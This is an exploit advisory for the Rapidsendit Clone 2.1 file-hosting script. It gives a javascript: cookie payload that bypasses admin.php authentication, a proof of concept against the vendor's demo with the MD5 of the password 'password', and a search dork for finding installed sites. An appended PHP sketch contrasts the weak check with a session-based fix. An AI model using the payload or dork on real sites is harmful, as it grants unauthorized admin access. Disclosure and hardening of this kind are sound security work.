======================================================================================

 [o] Rapidsendit Clone 2.1 Insecure Cookie Handling Vulnerability

       Software : Rapidsendit Clone version 2.1
       Vendor   : http://www.rapidsendit.com/
       Demo     : http://www.rapidsendit.com/script/demo.html
       Author   : NoGe
       Contact  : noge[dot]code[at]gmail[dot]com
       Blog     : http://evilc0de.blogspot.com

======================================================================================

 [o] Vulnerable file

       admin.php

 [o] Exploit

       javascript:document.cookie="logged=[md5_password_hash]; path=/";

 [o] Proof of concept

       http://www.rapidsendit.com/script/demo/admin.php

       replace url above with this javascript

       javascript:document.cookie="logged=696d29e0940a4957748fe3fc9efd22a3; path=/";

       696d29e0940a4957748fe3fc9efd22a3 = password

 [o] Dork

       "Powered By Rapidsendit Clone"

======================================================================================

 [o] Greetz

       MainHack BrotherHood [ http://serverisdown.org ]
       Vrs-hCk OoN_BoY Paman bL4Ck_3n91n3 Angela Zhang
       H312Y yooogy mousekill }^-^{ loqsa zxvf martfella
       skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke

======================================================================================
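
 [o] Fix sketch (added example)

       The advisory shows admin.php treating a "logged" cookie that holds the
       password's MD5 hash as proof of login. The PHP below is an added example,
       not Rapidsendit's code or the author's: it sets an assumed reconstruction
       of that check beside a server-side session. All function names, the stored
       hashes and the demo password are constructed.

```php
<?php
// Added example; not code from Rapidsendit Clone. The weak check is an
// assumed reconstruction of the behaviour the advisory describes, and all
// function names and the demo password are constructed.

// Weak: the cookie is compared with the stored MD5, so the hash itself is a
// bearer credential that never expires and that the client fully controls.
function is_admin_weak(array $cookies, string $storedMd5): bool
{
    return isset($cookies['logged']) && $cookies['logged'] === $storedMd5;
}

// Hardened: verify the password once, then keep the login state server-side.
// The browser only ever holds a random session id.
function login(string $password, string $passwordHash): bool
{
    if (!password_verify($password, $passwordHash)) {
        return false;
    }
    session_regenerate_id(true);   // discard the pre-login session id
    $_SESSION['is_admin'] = true;
    $_SESSION['created']  = time();
    return true;
}

function is_admin(int $maxAge = 1800): bool
{
    return !empty($_SESSION['is_admin'])
        && (time() - ($_SESSION['created'] ?? 0)) < $maxAge;
}

session_set_cookie_params([
    'path' => '/', 'httponly' => true, 'secure' => true, 'samesite' => 'Strict',
]);
session_start();

$demoPassword = 'constructed-demo-password';
$storedMd5    = md5($demoPassword);                        // legacy storage
$storedHash   = password_hash($demoPassword, PASSWORD_DEFAULT);

// A cookie carrying the stored hash satisfies the weak check on its own.
$weak = is_admin_weak(['logged' => $storedMd5], $storedMd5);
// The same cookie is ignored by the session-based check.
$_COOKIE['logged'] = $storedMd5;
$before = is_admin();
// The session is marked as admin only after the password itself is verified.
$after = login($demoPassword, $storedHash) && is_admin();
var_dump($weak, $before, $after);
```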